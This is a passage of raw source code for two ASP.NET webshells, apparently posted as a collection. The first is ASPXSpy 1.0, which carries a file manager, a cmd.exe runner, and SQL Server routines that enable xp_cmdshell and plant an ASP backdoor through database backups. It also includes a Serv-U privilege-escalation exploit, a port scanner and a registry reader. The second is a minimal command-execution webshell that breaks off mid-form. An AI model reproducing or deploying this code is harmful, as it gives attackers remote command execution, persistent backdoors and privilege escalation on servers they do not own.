(Bin_SQLRadioButton.Checked) { Bin_DBmenuPanel.Visible = true; Bin_DBinfoLabel.Visible = true; Bin_AccPanel.Visible = false; Bin_Scroll.Visible = false; Bin_dirPanel.Visible = false; OpenConnection(); DataTable ver = Bin_DataTable(@"SELECT @@VERSION"); DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases"); DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()"); DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')"); DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER('db_owner')"); string dbo = ""; if (owner.Rows[0][0].ToString() == "1") { dbo = "db_owner"; } else { dbo = "public"; } if (rol.Rows[0][0].ToString() == "1") { dbo = "<font color=blue>sa</font>"; } string db_info = ""; db_info = "<i><b><font color=red>SQLversion</font> : </b></i>" + ver.Rows[0][0].ToString() + "<br><hr>"; string db_name = ""; for (int i = 0; i < dbs.Rows.Count; i++) { db_name += dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(), "<font color=blue>" + cdb.Rows[0][0].ToString() + "</font>") + " | "; } db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>"; db_info += "<i><b><font color=red>SRVROLEMEMBER</font></i></b> : " + dbo + "<hr>"; Bin_DBinfoLabel.Text = db_info; } if (Bin_AccRadioButton.Checked) { Bin_DataGrid.Visible = false; Bin_SAexecButton.Visible = false; Bin_Accbind(); } } catch (Exception E) { Bin_Error(E.Message); } } protected void Bin_Accbind() { try { Bin_DBmenuPanel.Visible = false; Bin_AccPanel.Visible = true; OpenConnection(); DataTable acctable = new DataTable(); acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" }); string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>"; accstr += "Tables Count : " + acctable.Rows.Count + "<br>Please select a database : <SELECT onchange=if(this.value!='')Command('postdata',this);>"; for (int i = 0; i < acctable.Rows.Count; i++) { accstr += "<option value=" + acctable.Rows[i].ItemArray[2].ToString() + ">" + acctable.Rows[i].ItemArray[2].ToString() + "</option>"; } if (Session["Bin_Table"] != null) { accstr += "<option SELECTED>" + Session["Bin_Table"] + "</option>"; } accstr += "</SELECT>"; Bin_AccinfoLabel.Text = accstr; CloseConnection(); } catch (Exception Error) { Bin_Error(Error.Message); } } protected void Bin_Databind() { try { Bin_SAexecButton.Visible = false; Bin_Accbind(); Bin_Scroll.Visible = true; if (Bin_SQLRadioButton.Checked) { Bin_DBmenuPanel.Visible = true; Bin_DBinfoLabel.Visible = false; } Bin_DataGrid.Visible = true; DataTable databind = Bin_DataTable(@"SELECT * FROM " + Session["Bin_Table"]); Bin_DataGrid.DataSource = databind; Bin_DataGrid.DataBind(); } catch (Exception Error) { Bin_Error(Error.Message); } } public void Bin_ExecSql(string instr) { try { OpenConnection(); comm.CommandType = CommandType.Text; comm.CommandText = instr; comm.ExecuteNonQuery(); } catch (Exception e) { Bin_Error(e.Message); } } public void Item_DataBound(object sender,DataGridItemEventArgs e) { for (int i = 2; i < e.Item.Cells.Count; i++) { e.Item.Cells[i].Text = e.Item.Cells[i].Text.Replace("<", "<").Replace(">", ">"); } } protected void Bin_DBPage(object sender, DataGridPageChangedEventArgs e) { Bin_DataGrid.CurrentPageIndex = e.NewPageIndex; Bin_Databind(); } public void Item_Command(object sender, DataGridCommandEventArgs e) { if (e.CommandName == "Cancel") { Bin_DataGrid.EditItemIndex = -1; Bin_Databind(); } } protected void Bin_ExecButton_Click(object sender, EventArgs e) { try { Bin_Scroll.Visible = true; Bin_DataGrid.Visible = true; Bin_DataGrid.AllowPaging = true; Bin_Accbind(); if (Bin_SQLRadioButton.Checked) { Bin_DBmenuPanel.Visible = true; } string sqlstr = Bin_DBstrTextBox.Text; sqlstr = sqlstr.TrimStart().ToLower(); if (sqlstr.Substring(0, 6) == "select") { DataTable databind = Bin_DataTable(sqlstr); Bin_DataGrid.DataSource = databind; Bin_DataGrid.DataBind(); } else { Bin_ExecSql(sqlstr); Bin_Databind(); } } catch(Exception error) { Bin_Error(error.Message); } } protected void Bin_BDButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_Accbind(); Bin_DBmenuPanel.Visible = true; Bin_DataGrid.Visible = false; Bin_DataGrid.AllowPaging = true; Bin_Scroll.Visible = false; Bin_DBstrTextBox.Text = ""; Bin_SAexecButton.Visible = false; Bin_ResLabel.Visible = false; Bin_dirPanel.Visible = false; } protected void Bin_SACMDButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; Bin_SAexecButton.Visible = true; Bin_Change(); Bin_ExecButton.Visible = false; Bin_ResLabel.Visible = false; Session["Bin_Option"] = null; Bin_dirPanel.Visible = false; } public void Bin_Change() { Bin_ExecButton.Visible = false; string select = "<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select onchange=if(this.value!='')Command('changedata',this);><option>SQL Server Exec<option value=\"Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')\">Add sp_oacreate<option value=\"Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')\">Add xp_cmdshell<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">Add xp_cmdshell<option value=\"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;\">Add xp_cmdshell(SQL2005)<option value=\"Exec master.dbo.xp_cmdshell 'net user'\">XP_cmdshell exec<option value=\"Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\1.asp';\">SP_oamethod exec<option value=\"sp_makewebtask @outputfile='d:\\web\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))" + "%" + ">''' \">SP_makewebtask make file"; if (Session["Bin_Option"] != null) { select += "<option SELECTED>" + Session["Bin_Option"] + "</option>"; } select += "</select>"; Bin_AccinfoLabel.Text = select; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; } protected void Bin_SAexecButton_Click(object sender, EventArgs e) { try { Bin_Change(); Bin_DBinfoLabel.Visible = false; Bin_ExecButton.Visible = false; Bin_Scroll.Visible = false; Bin_DataGrid.Visible = false; Bin_DBmenuPanel.Visible = true; string sqlstr = Bin_DBstrTextBox.Text; DataTable databind = Bin_DataTable(sqlstr); string res = ""; foreach (DataRow dr in databind.Rows) { for (int i = 0; i < databind.Columns.Count; i++) { res += dr[i] + "\r"; } } Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", " ").Replace("<", "<").Replace(">", ">") + "</PRE></div>"; } catch (Exception error) { Bin_Error(error.Message); } } protected void Bin_DirButton_Click(object sender, EventArgs e) { Bin_dirPanel.Visible = true; Bin_AccPanel.Visible = false; Bin_DBinfoLabel.Visible = false; Bin_DataGrid.Visible = false; Bin_Scroll.Visible = false; } protected void Bin_listButton_Click(object sender, EventArgs e) { Bin_dirPanel.Visible = true; Bin_AccPanel.Visible = false; Bin_DBinfoLabel.Visible = false; Bin_SqlDir(); } public void Bin_SqlDir() { try { Bin_DataGrid.Visible = true; Bin_Scroll.Visible = true; Bin_DataGrid.AllowPaging = false; string exesql = "use pubs;if exists (select * from sysobjects where id = object_id(N'[bin_dir]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_dir]; CREATE TABLE bin_dir(DirName VARCHAR(400), DirAtt VARCHAR(400),DirFile VARCHAR(400)) INSERT bin_dir EXEC MASTER..XP_dirtree '" + Bin_DirTextBox.Text + "',1,1;"; Bin_ExecSql(exesql); DataTable sql_dir = Bin_DataTable("select * from bin_dir"); Bin_DataGrid.DataSource = sql_dir; Bin_DataGrid.DataBind(); } catch (Exception e) { Bin_Error(e.Message); } } protected void Bin_SuButton_Click(object sender, EventArgs e) { Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = true; Bin_IISPanel.Visible = false; Bin_SuresLabel.Text = ""; Bin_LoginPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = false; } protected void Bin_dbshellButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_AccPanel.Visible = false; Bin_BakDB(); } public void Bin_BakDB() { string path = Bin_DirTextBox.Text.Trim(); if (path.Substring(path.Length - 1, 1) == @"\") { path = path + "bin.asp"; } else { path = path + @"\bin.asp"; } string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup database @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup database @b to disk = @t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];"; Bin_ExecSql(sql); Bin_SqlDir(); } public void Bin_BakLog() { string path = Bin_DirTextBox.Text.Trim(); if (path.Substring(path.Length - 1, 1) == @"\") { path = path + "bin.asp"; } else { path = path + @"\bin.asp"; } string sql = "if exists (select * from sysobjects where id = object_id(N'[bin_cmd]') and OBJECTPROPERTY(id, N'IsUserTable') = 1) drop table [bin_cmd];create table [bin_cmd] ([cmd] [image]);declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x62696E backup log @a to disk = @s;insert into [bin_cmd](cmd) values(0x3C256578656375746520726571756573742822422229253E);declare @b sysname,@t nvarchar(4000) select @b=db_name(),@t='" + path + "' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];"; Bin_ExecSql(sql); Bin_SqlDir(); } protected void Bin_LogshellButton_Click(object sender, EventArgs e) { Bin_DBinfoLabel.Visible = false; Bin_AccPanel.Visible = false; Bin_BakLog(); } protected void Bin_SuexpButton_Click(object sender, EventArgs e) { string Result = ""; string user = Bin_SunameTextBox.Text; string pass = Bin_SupassTextBox.Text; int port = Int32.Parse(Bin_SuportTextBox.Text); string cmd = Bin_SucmdTextBox.Text; string loginuser = "user " + user + "\r\n"; string loginpass = "pass " + pass + "\r\n"; string site = "SITE MAINTENANCE\r\n"; string deldomain = "-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n"; string setdomain = "-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n"; string newdomain = "-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n"; string quite = "QUIT\r\n"; try { TcpClient tcp = new TcpClient("127.0.0.1", port); tcp.ReceiveBufferSize = 1024; NetworkStream NS = tcp.GetStream(); Result = Rev(NS); Result += Send(NS, loginuser); Result += Rev(NS); Result += Send(NS, loginpass); Result += Rev(NS); Result += Send(NS, site); Result += Rev(NS); Result += Send(NS, deldomain); Result += Rev(NS); Result += Send(NS, setdomain); Result += Rev(NS); Result += Send(NS, newdomain); Result += Rev(NS); TcpClient tcp1 = new TcpClient("127.0.0.1", 52521); NetworkStream NS1 = tcp1.GetStream(); Result += Rev(NS1); Result += Send(NS1, "user bin\r\n"); Result += Rev(NS1); Result += Send(NS1, "pass binftp\r\n"); Result += Rev(NS1); Result += Send(NS1, "site exec " + cmd + "\r\n"); Result += Rev(NS1); tcp1.Close(); Result += Send(NS, deldomain); Result += Rev(NS); Result += Send(NS, quite); Result += Rev(NS); tcp.Close(); } catch (Exception error) { Bin_Error(error.Message); } Bin_SuresLabel.Text = "<div id=\"su\"><pre>" + Result + "</pre></div>"; } protected string Rev(NetworkStream instream) { string Restr = ""; if (instream.CanRead) { byte[] buffer = new byte[1024]; instream.Read(buffer, 0, buffer.Length); Restr = Encoding.ASCII.GetString(buffer); } return "<font color = red>" + Restr + "</font><br>"; } protected string Send(NetworkStream instream,string Sendstr) { if (instream.CanWrite) { byte[] buffer = Encoding.ASCII.GetBytes(Sendstr); instream.Write(buffer, 0, buffer.Length); } return "<font color = blue>" + Sendstr + "</font><br>"; } protected void Bin_IISButton_Click(object sender, EventArgs e) { Bin_LoginPanel.Visible = false; Bin_MainPanel.Visible = false; Bin_MenuPanel.Visible = true; Bin_FilePanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = true; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = false; Bin_iisLabel.Text = Bin_iisinfo(); } protected void Bin_PortButton_Click(object sender, EventArgs e) { Bin_MenuPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_RegPanel.Visible = false; Bin_PortPanel.Visible = true; Bin_ScanresLabel.Text = ""; } protected void Bin_RegButton_Click(object sender, EventArgs e) { Bin_MenuPanel.Visible = true; Bin_LoginPanel.Visible = false; Bin_CmdPanel.Visible = false; Bin_SQLPanel.Visible = false; Bin_SuPanel.Visible = false; Bin_IISPanel.Visible = false; Bin_RegPanel.Visible = true; Bin_PortPanel.Visible = false; Bin_RegresLabel.Text = ""; } protected void Bin_RegreadButton_Click(object sender, EventArgs e) { try { string regkey = Bin_KeyTextBox.Text; string subkey = regkey.Substring(regkey.IndexOf("\\") + 1, regkey.Length - regkey.IndexOf("\\") - 1); RegistryKey rk = null; if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_LOCAL_MACHINE") { rk = Registry.LocalMachine.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CLASSES_ROOT") { rk = Registry.ClassesRoot.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_USER") { rk = Registry.CurrentUser.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_USERS") { rk = Registry.Users.OpenSubKey(subkey); } if (regkey.Substring(0, regkey.IndexOf("\\")) == "HKEY_CURRENT_CONFIG") { rk = Registry.CurrentConfig.OpenSubKey(subkey); } Bin_RegresLabel.Text = "<br>Result : " + rk.GetValue(Bin_ValueTextBox.Text, "NULL").ToString(); } catch (Exception error) { Bin_Error(error.Message); } } protected void Bin_ScancmdButton_Click(object sender, EventArgs e) { try { string res = ""; string[] port = Bin_PortsTextBox.Text.Split(','); for (int i = 0; i < port.Length; i++) { res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>"; } Bin_ScanresLabel.Text = "<hr>" + res; } catch (Exception error) { Bin_Error(error.Message); } } protected string Bin_Scan(string ip, int port) { string scanres = ""; TcpClient tcp = new TcpClient(); tcp.SendTimeout = tcp.ReceiveTimeout = 2000; try { tcp.Connect(ip, port); tcp.Close(); scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>"; } catch (SocketException e) { scanres = ip + " : " + port + " ................................. <font color=red><b>Close</b></font>"; } return scanres; } </script> <html xmlns="http://www.w3.org/1999/xhtml" > <head runat="server"> <title>ASPXSpy1.0 -> Bin:)</title> <style type="text/css"> A:link { COLOR:#000000; TEXT-DECORATION:None } A:visited { COLOR:#000000; TEXT-DECORATION:None } A:active { COLOR:#000000; TEXT-DECORATION:None } A:hover { COLOR:#000000; TEXT-DECORATION:underline } BODY { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; } #nei { width:500px; margin:0px auto; overflow:hidden } #su { width:300px; margin:0px auto; overflow:hidden } #cmd { width:500px; margin:0px auto; overflow:hidden } </style> <script type="text/javascript" language="javascript" > function Command(cmd, str) { var strTmp = str; var frm = document.forms[0]; if(cmd == 'del') { if(confirm('Del It ?')) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } else return; } if (cmd == 'change') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'down') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'showatt') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'edit') { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'deldir') { if(confirm('Del It ?')) { frm.todo.value = str; frm.goaction.value = cmd; frm.submit(); } else return; } if(cmd == 'rename' ) { frm.goaction.value = cmd; frm.todo.value = str + ','; str = prompt('Please input new filename:', strTmp); if(str && (strTmp != str)) { frm.todo.value += str; frm.submit(); } else return; } if(cmd == 'renamedir' ) { frm.goaction.value = cmd; frm.todo.value = str + ','; str = prompt('Please input new foldername:', strTmp); if(str && (strTmp != str)) { frm.todo.value += str; frm.submit(); } else return; } if (cmd == 'postdata') { frm.todo.value = str.value; frm.goaction.value = cmd; frm.submit(); } if (cmd == 'changedata') { frm.todo.value = str.value; frm.intext.value = str.options[str.selectedIndex].innerText frm.goaction.value = cmd; frm.submit(); } } </script> </head> <body> <form id="form1" runat="server"><div style="text-align: center"><asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px"> <asp:Label ID="PassLabel" runat="server" Text="Password:"></asp:Label> <asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox> <asp:Button ID="LoginButton" runat="server" Text="Enter" OnClick="LoginButton_Click" /><p /> Copyright (C) 2008 Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a></asp:Panel><asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px"> <asp:Label ID="TimeLabel" runat="server" Text="Label" Width="150px"></asp:Label><br /> <asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="Sysinfo" /> <asp:Button ID="Bin_IISButton" runat="server" OnClick="Bin_IISButton_Click" Text="IISSpy" /> <asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="WebShell" /> <asp:Button ID="Bin_CmdButton" runat="server" Text="Command" OnClick="Bin_CmdButton_Click" /> <asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="SqlTools" /> <asp:Button ID="Bin_SuButton" runat="server" OnClick="Bin_SuButton_Click" Text="SuExp" /> <asp:Button ID="Bin_PortButton" runat="server" Text="PortScan" OnClick="Bin_PortButton_Click" /> <asp:Button ID="Bin_RegButton" runat="server" Text="RegShell" OnClick="Bin_RegButton_Click" /> <asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="Logout" /><br /> <asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False">Copyright (C) 2008 Bin -> <a href="http://www.rootkit.net.cn" target="_blank">WwW.RoOTkIt.NeT.Cn</a> -> <a href="http://www.rootkit.net.cn/index.aspx" target="_blank">Reverse-IP</a> </asp:Label></asp:Panel> <asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px"> <div style="text-align: left"><asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False" ></asp:Label></div></asp:Panel><div style="text-align: center"> <asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False"><div style="text-align: left"><asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br /> <asp:Label ID="Bin_UpfileLabel" runat="server" Text="Upfile : "></asp:Label> <input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" /> <asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox> <asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" /> <asp:Button ID="Bin_upButton" runat="server" Text="UpLoad" OnClick="Bin_upButton_Click" EnableViewState="False" /><br /> <asp:Label ID="Bin_CreateLabel" runat="server" Text="Create :"></asp:Label> <asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton" runat="server" Text="NewFile" OnClick="Bin_NewFileButton_Click" /> <asp:Button ID="Bin_NewdirButton" runat="server" Text="NewDir" OnClick="Bin_NewdirButton_Click" /> <br /> <asp:Label ID="Bin_CopyLabel" runat="server" Text="Copy :" Width="39px"></asp:Label> <asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox> <asp:Label ID="Bin_CopytoLable" runat="server" Text="To:"></asp:Label> <asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox> <asp:Button ID="Bin_CopyButton" runat="server" Text="Copy" OnClick="Bin_CopyButton_Click" /> <asp:Button ID="Bin_CutButton" runat="server" Text="Cut" Width="46px" OnClick="Bin_CutButton_Click" /> <asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label></div><div style="text-align: center"> <asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False"><hr /> FileName : <asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br /> <asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="ReadOnly" /> <asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="System" /> <asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="Hidden" /> <asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="Archive" /> <br /> CreationTime : <asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox> LastWriteTime : <asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox> LastAccessTime : <asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br /> <asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="Set" /> <asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="Back" /> <hr /> </asp:Panel></div> <div style="text-align: center"><asp:Panel ID="Bin_EditPanel" runat="server" Visible="False"><hr style="width: 757px" /> Path:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br /> <asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="100" Rows="25" Width="760px"></asp:TextBox><br /> <asp:Button ID="Bin_EditButton" runat="server" Text="Sumbit" OnClick="Bin_EditButton_Click" /> <asp:Button ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="Back" /></asp:Panel></div></asp:Panel></div> <asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px"><hr /> CmdPath : <asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br /> Argument : <asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br /> <asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="Run" /> <div style="text-align: left"> <asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label></div> <hr /></asp:Panel> <asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px"> <hr /> ConnString : <asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="547px">server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB</asp:TextBox><br /> <asp:RadioButton ID="Bin_SQLRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_SQLRadioButton_CheckedChanged" Text="MS-SQL" Checked="True" /> <asp:RadioButton ID="Bin_AccRadioButton" runat="server" AutoPostBack="True" OnCheckedChanged="Bin_AccRadioButton_CheckedChanged" Text="MS-Access" /> <asp:Button ID="SQL_SumbitButton" runat="server" Text="Sumbit" OnClick="SQL_SumbitButton_Click" /><hr /> <asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False"> <asp:Button ID="Bin_BDButton" runat="server" Text="DataBase" OnClick="Bin_BDButton_Click" /> <asp:Button ID="Bin_SACMDButton" runat="server" Text="SA_Exec" OnClick="Bin_SACMDButton_Click" /> <asp:Button ID="Bin_DirButton" runat="server" Text="SQL_Dir" OnClick="Bin_DirButton_Click" /><br /><hr /><div style="text-align: left"> <asp:Label ID="Bin_DBinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label></div></asp:Panel> <asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False"> <asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br /> <asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox> <asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="Exec" /> <asp:Button ID="Bin_SAexecButton" runat="server" Text="SA_Exec" OnClick="Bin_SAexecButton_Click" /><br /> <div style="text-align:left"> <asp:Label ID="Bin_ResLabel" runat="server" ></asp:Label></div></asp:Panel> <asp:Panel ID="Bin_dirPanel" runat="server" Visible="False" Width="759px"> Path : <asp:TextBox ID="Bin_DirTextBox" runat="server" Width="447px">c:\</asp:TextBox> <br /> <asp:Button ID="Bin_listButton" runat="server" OnClick="Bin_listButton_Click" Text="Dir" /> <asp:Button ID="Bin_dbshellButton" runat="server" OnClick="Bin_dbshellButton_Click" Text="Bak_DB" /> <asp:Button ID="Bin_LogshellButton" runat="server" Text="Bak_LOG" OnClick="Bin_LogshellButton_Click" /><hr /></asp:Panel> <br /><br /> <div style="overflow:scroll; text-align:left; width:770px;" id="Bin_Scroll" runat="server" visible="false" > <asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="20" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command"> <PagerStyle Mode="NumericPages" Position="TopAndBottom" /> </asp:DataGrid></div> </asp:Panel> <asp:Panel ID="Bin_SuPanel" runat="server" Width="763px" > <hr /> Name : <asp:TextBox ID="Bin_SunameTextBox" runat="server">localadministrator</asp:TextBox> Pass : <asp:TextBox ID="Bin_SupassTextBox" runat="server">#l@$ak#.lk;0@P</asp:TextBox> Port : <asp:TextBox ID="Bin_SuportTextBox" runat="server">43958</asp:TextBox><br /> CMD : <asp:TextBox ID="Bin_SucmdTextBox" runat="server" Width="447px">cmd.exe /c net user</asp:TextBox><br /> <asp:Button ID="Bin_SuexpButton" runat="server" Text="Exploit" OnClick="Bin_SuexpButton_Click" /><br /> <div style="text-align:left"> <hr /> <asp:Label ID="Bin_SuresLabel" runat="server"></asp:Label> </div> </asp:Panel> <asp:Panel ID="Bin_IISPanel" runat="server" Width="763px"><div style="text-align:left"> <hr /> <asp:Label ID="Bin_iisLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label> </div></asp:Panel> <asp:Panel ID="Bin_RegPanel" runat="server" Width="763px"><hr /><div style="text-align:left"> KEY : <asp:TextBox ID="Bin_KeyTextBox" runat="server" Width="595px">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName</asp:TextBox><br /> VALUE : <asp:TextBox ID="Bin_ValueTextBox" runat="server" Width="312px">ComputerName</asp:TextBox> <asp:Button ID="Bin_RegreadButton" runat="server" Text="Read" OnClick="Bin_RegreadButton_Click" /><br /> <asp:Label ID="Bin_RegresLabel" runat="server"></asp:Label><hr /></div></asp:Panel> <asp:Panel ID="Bin_PortPanel" runat="server" Width="763px"> <hr /><div style="text-align:left"> IP : <asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox> PORT : <asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">21,80,1433,3306,3389,4899,5631,43958,65500</asp:TextBox> <asp:Button ID="Bin_ScancmdButton" runat="server" Text="Scan" OnClick="Bin_ScancmdButton_Click" /><br /> <asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label></div><hr /></asp:Panel> </div></form> </body> </html>
0x2: 简单CMS WEBSHELL
<%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace="System.Runtime.InteropServices" %> <%@ Import Namespace="System.IO" %> <%@ Import Namespace="System.Data" %> <%@ Import Namespace="System.Reflection" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.Web" %> <%@ Import Namespace="System.Web.UI" %> <%@ Import Namespace="System.Web.UI.WebControls" %> <script runat="server"> protected void exec(object sender, EventArgs e) { string item = cmd.Text; Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardError = true; p.StartInfo.CreateNoWindow = true; string strOutput = null; p.Start(); p.StandardInput.WriteLine(item); p.StandardInput.WriteLine("exit"); strOutput = p.StandardOutput.ReadToEnd(); p.WaitForExit(); p.Close(); Response.Write("<pre>"); Response.Write(strOutput); Response.Write("</pre>"); } protected void Page_Load(object sender, EventArgs e) { } </script> <form id="form1" runat="server"> <asp:TextBox id="cmd" 